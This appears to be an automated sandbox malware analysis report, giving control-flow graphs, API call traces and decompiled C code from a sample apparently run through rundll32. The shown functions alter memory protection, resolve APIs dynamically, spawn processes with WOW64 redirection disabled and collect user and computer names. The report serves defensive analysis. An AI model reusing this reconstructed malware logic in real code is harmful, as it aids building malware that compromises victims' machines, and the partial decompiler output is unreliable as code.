                                                          control_flow_graph 171 5588323-5588336 172 5588388-5588394 171->172 173 5588338-5588342 call 558c26c call 5571794 171->173 175 5588396-55883b5 CloseHandle 172->175 176 55883b7-55883c3 call 5590779 172->176 187 5588348-5588355 SleepEx 173->187 175->176 182 55883d4-55883db 176->182 183 55883c5-55883d2 ReleaseMutex CloseHandle 176->183 185 55883ec-55883f9 SleepEx 182->185 186 55883dd-55883ea ResetEvent CloseHandle 182->186 183->182 185->185 188 55883fb 185->188 186->185 187->187 189 5588357-558835e 187->189 190 5588400-558840d SleepEx 188->190 191 5588360-5588366 189->191 192 5588374-5588386 RtlDeleteCriticalSection * 2 189->192 193 558840f-5588414 190->193 194 5588416-558841d 190->194 191->192 195 5588368-558836f call 557231d 191->195 192->172 193->190 193->194 197 558842d-5588433 194->197 198 558841f-5588427 HeapFree 194->198 195->192 199 558843a-5588445 197->199 200 5588435 call 558047b 197->200 198->197 202 5588456-558845d 199->202 203 5588447-558844e 199->203 200->199 205 558845f-5588460 RtlRemoveVectoredExceptionHandler 202->205 206 5588466-558846c 202->206 203->202 204 5588450-5588452 203->204 204->202 205->206 207 558846e call 5583e58 206->207 208 5588473 206->208 207->208 210 5588478-5588485 SleepEx 208->210 211 558848e-5588495 210->211 212 5588487-558848c 210->212 213 55884ad-55884bd LocalFree 211->213 214 5588497-558849c 211->214 212->210 212->211 214->213 215 558849e 214->215 216 55884a1-55884ab CloseHandle 215->216 216->213 216->216
                                                          APIs
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 0558834C
                                                          • RtlDeleteCriticalSection.NTDLL(0559C2E0), ref: 0558837F
                                                          • RtlDeleteCriticalSection.NTDLL(0559C300), ref: 05588386
                                                          • CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883B5
                                                          • ReleaseMutex.KERNEL32(000003F4,00000000,?,?,?,0558BCB5), ref: 055883C6
                                                          • CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883D2
                                                          • ResetEvent.KERNEL32(00000000,00000000,?,?,?,0558BCB5), ref: 055883DE
                                                          • CloseHandle.KERNEL32(?,?,0558BCB5), ref: 055883EA
                                                          • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0558BCB5), ref: 055883F0
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0558BCB5), ref: 05588404
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0558BCB5), ref: 05588427
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(00F505B8), ref: 05588460
                                                          • SleepEx.KERNEL32(00000064,00000001,?,?,0558BCB5), ref: 0558847C
                                                          • CloseHandle.KERNEL32(059B8558,?,?,0558BCB5), ref: 055884A3
                                                          • LocalFree.KERNEL32(?,?,0558BCB5), ref: 055884B3
                                                            • Part of subcall function 0558C26C: GetVersion.KERNEL32(?,00000000,7519F720,?,0558833D,00000000,?,?,?,0558BCB5), ref: 0558C290
                                                            • Part of subcall function 0558C26C: GetModuleHandleA.KERNEL32(?,059B9759,?,0558833D,00000000,?,?,?,0558BCB5), ref: 0558C2AD
                                                            • Part of subcall function 0558C26C: GetProcAddress.KERNEL32(00000000), ref: 0558C2B4
                                                            • Part of subcall function 05571794: RtlEnterCriticalSection.NTDLL(0559C300), ref: 0557179E
                                                            • Part of subcall function 05571794: RtlLeaveCriticalSection.NTDLL(0559C300), ref: 055717DA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                          • String ID:
                                                          • API String ID: 1924086638-0
                                                          • Opcode ID: a24f5aad825e022c21c1ce3dda6e597b8fb14d85891984104d89053962cfb64a
                                                          • Instruction ID: 010805e4bca37e453b745d379e2f3ead5c9a5daec61fc445ed698b9f2128abac
                                                          • Opcode Fuzzy Hash: a24f5aad825e022c21c1ce3dda6e597b8fb14d85891984104d89053962cfb64a
                                                          • Instruction Fuzzy Hash: C9414232650206DBDB20BFA5EC86A797BA5F700354B860467F501B7260CF79AC8CAF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E52F12, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110librarymemoryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 247 e52f12-e52f35 call e56acc 250 e53047-e5304e 247->250 251 e52f3b-e52f54 call e577ff call 557bcb3 247->251 255 e53035-e53042 call e513cc 251->255 256 e52f5a-e52f61 251->256 255->250 256->255 257 e52f67-e52f9a memset call e54b6b 256->257 262 e52fa0-e52fc4 GetModuleHandleA GetProcAddress 257->262 263 e5302e 257->263 265 e53015 262->265 266 e52fc6-e52feb Wow64EnableWow64FsRedirection 262->266 263->255 267 e5301c-e5302c HeapFree 265->267 272 e52fec call 557ccb6 266->272 273 e52fec call 5583aea 266->273 274 e52fec call 557cc84 266->274 267->255 268 e52fee-e52ff6 Wow64EnableWow64FsRedirection 269 e52ff8-e53008 CloseHandle * 2 268->269 270 e5300a-e53013 GetLastError 268->270 269->267 270->267 272->268 273->268 274->268
                                                          C-Code - Quality: 61%
                                                          			E00E52F12(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t71 =  *((intOrPtr*)(__eax + 0x14));
				_t39 = E00E56ACC(__ecx,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x14)) + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00E577FF( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0xe5a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xe5a2d4; // 0x435d5a8
					_t18 = _t50 + 0xe5b55b; // 0x73797325
					_t52 = E00E54B6B(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xe5a2d4; // 0x435d5a8
						_t20 = _t53 + 0xe5b73d; // 0x51b8ce5
						_t21 = _t53 + 0xe5b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xe5a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00E513CC(_t76);
				goto L12;
			}



















                                                          0x00e52f1b
                                                          0x00e52f29
                                                          0x00e52f32
                                                          0x00e52f35
                                                          0x00e53047
                                                          0x00e5304e
                                                          0x00e5304e
                                                          0x00e52f44
                                                          0x00e52f4c
                                                          0x00e52f51
                                                          0x00e52f54
                                                          0x00e52f69
                                                          0x00e52f6f
                                                          0x00e52f70
                                                          0x00e52f73
                                                          0x00e52f79
                                                          0x00e52f7c
                                                          0x00e52f81
                                                          0x00e52f89
                                                          0x00e52f90
                                                          0x00e52f97
                                                          0x00e52f9a
                                                          0x00e5302e
                                                          0x00e52fa0
                                                          0x00e52fa0
                                                          0x00e52fa5
                                                          0x00e52fac
                                                          0x00e52fc0
                                                          0x00e52fc4
                                                          0x00e53015
                                                          0x00e52fc6
                                                          0x00e52fc6
                                                          0x00e52fcd
                                                          0x00e52fd4
                                                          0x00e52fec
                                                          0x00e52ff2
                                                          0x00e52ff6
                                                          0x00e53010
                                                          0x00e52ff8
                                                          0x00e53001
                                                          0x00e53006
                                                          0x00e53006
                                                          0x00e52ff6
                                                          0x00e53026
                                                          0x00e53026
                                                          0x00e52f9a
                                                          0x00e53035
                                                          0x00e5303e
                                                          0x00e53042
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00E56ACC: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00E52F2E,?,?,?,?,00000000,00000000), ref: 00E56AF1
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00E56B13
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00E56B29
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00E56B3F
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00E56B55
                                                            • Part of subcall function 00E56ACC: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00E56B6B
                                                          • memset.NTDLL ref: 00E52F7C
                                                            • Part of subcall function 00E54B6B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00E52F95,73797325), ref: 00E54B7C
                                                            • Part of subcall function 00E54B6B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00E54B96
                                                          • GetModuleHandleA.KERNEL32(4E52454B,051B8CE5,73797325), ref: 00E52FB3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00E52FBA
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00E52FD4
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00E52FF2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00E53001
                                                          • CloseHandle.KERNEL32(?), ref: 00E53006
                                                          • GetLastError.KERNEL32 ref: 00E5300A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E53026
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                          • String ID: zu
                                                          • API String ID: 91923200-1569895686
                                                          • Opcode ID: 1cc4c65e707246fc26571383b34ad56f318e52eac17880f84204cd6b1a153a80
                                                          • Instruction ID: 607216d99ecb9aac3bf9aee7ed8419a74c5e7d5d6b2f467a8fb9a3dc43a49be4
                                                          • Opcode Fuzzy Hash: 1cc4c65e707246fc26571383b34ad56f318e52eac17880f84204cd6b1a153a80
                                                          • Instruction Fuzzy Hash: D5318971900319EFCB11AFA5DC489DEBFB8EF08352F100861EA05B31A1C7719A48DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05592EC9, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 296 5592ec9-5592eea call 5595254 299 5592fca 296->299 300 5592ef0-5592ef1 296->300 301 5592fd0-5592fdf VirtualProtect 299->301 302 5592ef3-5592ef6 300->302 303 5592f56-5592f5d 300->303 306 5592ffc-5593002 GetLastError 301->306 307 5592fe1-5592ff7 VirtualProtect 301->307 308 5592efc 302->308 309 5593021-559302d call 559528f 302->309 304 5592f9d-5592fb2 VirtualProtect 303->304 305 5592f5f-5592f65 303->305 304->301 312 5592fb4-5592fc8 304->312 305->304 311 5592f67-5592f73 305->311 306->309 313 5592f02-5592f08 307->313 308->313 311->301 317 5592f75-5592f82 VirtualProtect 311->317 318 5592f99-5592f9b VirtualProtect 312->318 314 5592f4a-5592f51 313->314 315 5592f0a-5592f0e 313->315 314->309 315->314 319 5592f10-5592f2c lstrlen VirtualProtect 315->319 317->301 320 5592f84-5592f98 317->320 318->301 319->314 321 5592f2e-5592f48 lstrcpy VirtualProtect 319->321 320->318 321->314
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F16
                                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F28
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 05592F37
                                                          • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F48
                                                          • VirtualProtect.KERNEL32(?,00000005,00000040,-0000001C,055984F0,00000018,055717BF,7519F720,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F7E
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592F99
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,055984F0,00000018,055717BF,7519F720,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FAE
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,055984F0,00000018,055717BF,7519F720,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FDB
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FF5
                                                          • GetLastError.KERNEL32(?,00000000,05588342,00000000,?,?,?,0558BCB5), ref: 05592FFC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3676034644-0
                                                          • Opcode ID: 0da922f4274bee0c13edc2d904b65b3ac7def62db9f81aae872bfedfed388e34
                                                          • Instruction ID: 7b67d05eb212cc9a392878300c429d098953f83034ab94cd2df7e2fb98d80b3f
                                                          • Opcode Fuzzy Hash: 0da922f4274bee0c13edc2d904b65b3ac7def62db9f81aae872bfedfed388e34
                                                          • Instruction Fuzzy Hash: 16414E7590070AEFDF25DFA5CC45EAABBB9FF08310F018519E656A65A0D738E805DF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558ED7B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 322 558ed7b-558edba call 559079b VirtualAlloc 325 558ee8b 322->325 326 558edc0-558edcb call 559079b 322->326 328 558ee93-558ee95 325->328 329 558edd0-558edd6 326->329 330 558eea5-558eeb0 328->330 331 558ee97-558ee9e 328->331 332 558edd8-558eddc 329->332 333 558edfe-558ee00 329->333 331->330 332->333 335 558edde-558edfc VirtualAlloc 332->335 333->325 334 558ee06-558ee0a 333->334 334->325 336 558ee0c-558ee17 334->336 335->326 335->333 336->328 338 558ee19 336->338 339 558ee1f-558ee2c 338->339 340 558ee68-558ee82 339->340 341 558ee2e-558ee37 lstrcmpi 339->341 340->328 343 558ee84-558ee89 340->343 341->340 342 558ee39-558ee44 StrChrA 341->342 344 558ee54-558ee64 342->344 345 558ee46-558ee52 lstrcmpi 342->345 343->328 344->339 346 558ee66 344->346 345->340 345->344 346->328
                                                          APIs
                                                            • Part of subcall function 0559079B: GetProcAddress.KERNEL32(?,00000318), ref: 055907C0
                                                            • Part of subcall function 0559079B: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 055907DC
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDB4
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0558EE9F
                                                            • Part of subcall function 0559079B: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05590946
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0558EDEA
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDF6
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 0558EE33
                                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0558EE3C
                                                          • lstrcmpi.KERNEL32(?,00000000), ref: 0558EE4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                          • String ID: u
                                                          • API String ID: 3901270786-4067256894
                                                          • Opcode ID: 7a0663c640ec0feb06539326eeeae567b12982aef53e874a71004f2a956cdae4
                                                          • Instruction ID: 17d613381c00559e42e8542a8953a1f6aeaeda35bf96502efc114a4ec0858503
                                                          • Opcode Fuzzy Hash: 7a0663c640ec0feb06539326eeeae567b12982aef53e874a71004f2a956cdae4
                                                          • Instruction Fuzzy Hash: 5B316D71509315ABD721EF11C846B2BBBF9FF88B54F010919F985B7280D774E908CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5435F, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 385 e5435f-e5437a call e569ce 388 e54390-e5439e 385->388 389 e5437c-e5438a 385->389 391 e543b0-e543f7 call e5570a ConvertStringSecurityDescriptorToSecurityDescriptorA call e566ce 388->391 392 e543a0-e543a3 388->392 389->388 400 e54402-e54405 391->400 401 e543f9-e543fc CloseHandle 391->401 392->391 393 e543a5-e543aa 392->393 393->391 395 e5458f 393->395 398 e54591-e54597 395->398 402 e54407-e5440c 400->402 403 e5442e-e5443e 400->403 401->400 404 e54412 402->404 405 e5457b-e5457f 402->405 406 e54487-e544a5 call e51262 call e55fbc 403->406 407 e54440-e54455 call e56cd6 call e55fbc 403->407 411 e54415-e54427 call e5663c 404->411 408 e54587 405->408 409 e54581-e54585 405->409 425 e544a7-e544d0 memset RtlInitializeCriticalSection 406->425 426 e544d2-e544d4 406->426 423 e54457-e5447e wsprintfA 407->423 424 e54481 407->424 416 e5458d 408->416 409->398 409->408 421 e54429 411->421 416->398 421->405 423->424 424->406 427 e544d5-e544d7 425->427 426->427 427->405 428 e544dd-e544f3 RtlAllocateHeap 427->428 429 e544f5-e5451b wsprintfA 428->429 430 e5451d-e5451f 428->430 431 e54520-e54522 429->431 430->431 431->405 432 e54524-e54544 call e56cd6 call e5725f 431->432 432->405 437 e54546-e5454d call e5355c 432->437 440 e54554-e5455b 437->440 441 e5454f-e54552 437->441 442 e54570-e54574 call e550a3 440->442 443 e5455d-e5455f 440->443 441->405 447 e54579 442->447 443->405 444 e54561-e5456e call e52a24 443->444 444->405 444->442 447->405
                                                          C-Code - Quality: 64%
                                                          			E00E5435F(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00E569CE();
				if(_t27 != 0) {
					_t77 =  *0xe5a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xe5a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xe5a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00E5570A( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xe5a2d4; // 0x435d5a8
					_push(0xe5a2fc);
					_push(1);
					_t7 = _t32 + 0xe5b5bc; // 0x4d283a53
					 *0xe5a2f8 = 0xc;
					 *0xe5a300 = 0;
					L00E52BFF();
					_t36 = E00E566CE(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00E56CD6(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00E55FBC(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xe5a2d4; // 0x435d5a8
								_t18 = _t64 + 0xe5b86f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xe5a32c = _t87;
						}
						_t38 = E00E51262();
						 *0xe5a2c8 =  *0xe5a2c8 ^ 0xe8fa7dd7;
						 *0xe5a31c = _t38;
						_t39 = E00E55FBC(0x60);
						__eflags = _t39;
						 *0xe5a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xe5a37c; // 0x51b9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xe5a37c; // 0x51b9630
							 *_t56 = 0xe5b85e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xe5a290, _t84, 0x52);
							__eflags = _t42;
							 *0xe5a314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xe5a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xe5a2d4; // 0x435d5a8
								_t19 = _t76 + 0xe5b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xe592a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00E56CD6( ~_v8 &  *0xe5a2c8, 0xe5a00c); // executed
								_t84 = E00E5725F(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00E5355C();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00E550A3(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00E52A24(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xe5a14c(); // executed
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00E5663C(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                                          0x00e5435f
                                                          0x00e5436a
                                                          0x00e5436d
                                                          0x00e54370
                                                          0x00e54373
                                                          0x00e5437a
                                                          0x00e5437c
                                                          0x00e54388
                                                          0x00e5438a
                                                          0x00e5438a
                                                          0x00e54393
                                                          0x00e5439b
                                                          0x00e5439e
                                                          0x00e543b8
                                                          0x00e543bd
                                                          0x00e543be
                                                          0x00e543c0
                                                          0x00e543c5
                                                          0x00e543ca
                                                          0x00e543cc
                                                          0x00e543d3
                                                          0x00e543dd
                                                          0x00e543e3
                                                          0x00e543f0
                                                          0x00e543f7
                                                          0x00e543fc
                                                          0x00e543fc
                                                          0x00e54405
                                                          0x00e5442e
                                                          0x00e54431
                                                          0x00e5443e
                                                          0x00e54445
                                                          0x00e54451
                                                          0x00e54453
                                                          0x00e54455
                                                          0x00e5445a
                                                          0x00e54460
                                                          0x00e54466
                                                          0x00e5446c
                                                          0x00e5446f
                                                          0x00e54474
                                                          0x00e5447c
                                                          0x00e5447e
                                                          0x00e5447e
                                                          0x00e54481
                                                          0x00e54481
                                                          0x00e54487
                                                          0x00e5448c
                                                          0x00e54494
                                                          0x00e54499
                                                          0x00e5449e
                                                          0x00e544a0
                                                          0x00e544a5
                                                          0x00e544d4
                                                          0x00e544a7
                                                          0x00e544ac
                                                          0x00e544b1
                                                          0x00e544b6
                                                          0x00e544bd
                                                          0x00e544c3
                                                          0x00e544c8
                                                          0x00e544ce
                                                          0x00e544ce
                                                          0x00e544d5
                                                          0x00e544d7
                                                          0x00e544e6
                                                          0x00e544ec
                                                          0x00e544ee
                                                          0x00e544f3
                                                          0x00e5451f
                                                          0x00e544f5
                                                          0x00e544f5
                                                          0x00e544fb
                                                          0x00e54508
                                                          0x00e5450e
                                                          0x00e5450e
                                                          0x00e54516
                                                          0x00e54518
                                                          0x00e54520
                                                          0x00e54522
                                                          0x00e54529
                                                          0x00e54536
                                                          0x00e54540
                                                          0x00e54542
                                                          0x00e54544
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54546
                                                          0x00e5454b
                                                          0x00e5454d
                                                          0x00e54554
                                                          0x00e54558
                                                          0x00e5455b
                                                          0x00e54570
                                                          0x00e54574
                                                          0x00e54579
                                                          0x00000000
                                                          0x00e54579
                                                          0x00e5455d
                                                          0x00e5455f
                                                          0x00000000
                                                          0x00000000
                                                          0x00e54561
                                                          0x00e5456a
                                                          0x00e5456c
                                                          0x00e5456e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e5456e
                                                          0x00e54551
                                                          0x00e54551
                                                          0x00e54522
                                                          0x00e54407
                                                          0x00e54407
                                                          0x00e5440c
                                                          0x00e5457b
                                                          0x00e5457f
                                                          0x00e54587
                                                          0x00e54587
                                                          0x00000000
                                                          0x00e5457f
                                                          0x00e54412
                                                          0x00e54415
                                                          0x00e54415
                                                          0x00e54417
                                                          0x00e5441a
                                                          0x00e54422
                                                          0x00e54429
                                                          0x00000000
                                                          0x00e5458f
                                                          0x00e5458f
                                                          0x00e54592
                                                          0x00e54597
                                                          0x00e54597

                                                          APIs
                                                            • Part of subcall function 00E569CE: GetModuleHandleA.KERNEL32(4C44544E,00000000,00E54378,00000000,00000000,00000000,?,?,?,?,?,00E568F7,?,00000001), ref: 00E569DD
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00E5A2FC,00000000), ref: 00E543E3
                                                          • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00E568F7,?,00000001), ref: 00E543FC
                                                          • wsprintfA.USER32 ref: 00E5447C
                                                          • memset.NTDLL ref: 00E544AC
                                                          • RtlInitializeCriticalSection.NTDLL(051B95F0), ref: 00E544BD
                                                          • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00E544E6
                                                          • wsprintfA.USER32 ref: 00E54516
                                                            • Part of subcall function 00E56CD6: GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D0D
                                                            • Part of subcall function 00E56CD6: RtlAllocateHeap.NTDLL(00000000,;E), ref: 00E56D24
                                                            • Part of subcall function 00E56CD6: GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D31
                                                            • Part of subcall function 00E56CD6: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00E5453B,?,?,?,?,?,00E568F7,?,00000001), ref: 00E56D52
                                                            • Part of subcall function 00E56CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D79
                                                            • Part of subcall function 00E56CD6: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00E56D8D
                                                            • Part of subcall function 00E56CD6: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D9A
                                                            • Part of subcall function 00E56CD6: HeapFree.KERNEL32(00000000,00000000), ref: 00E56DB8
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
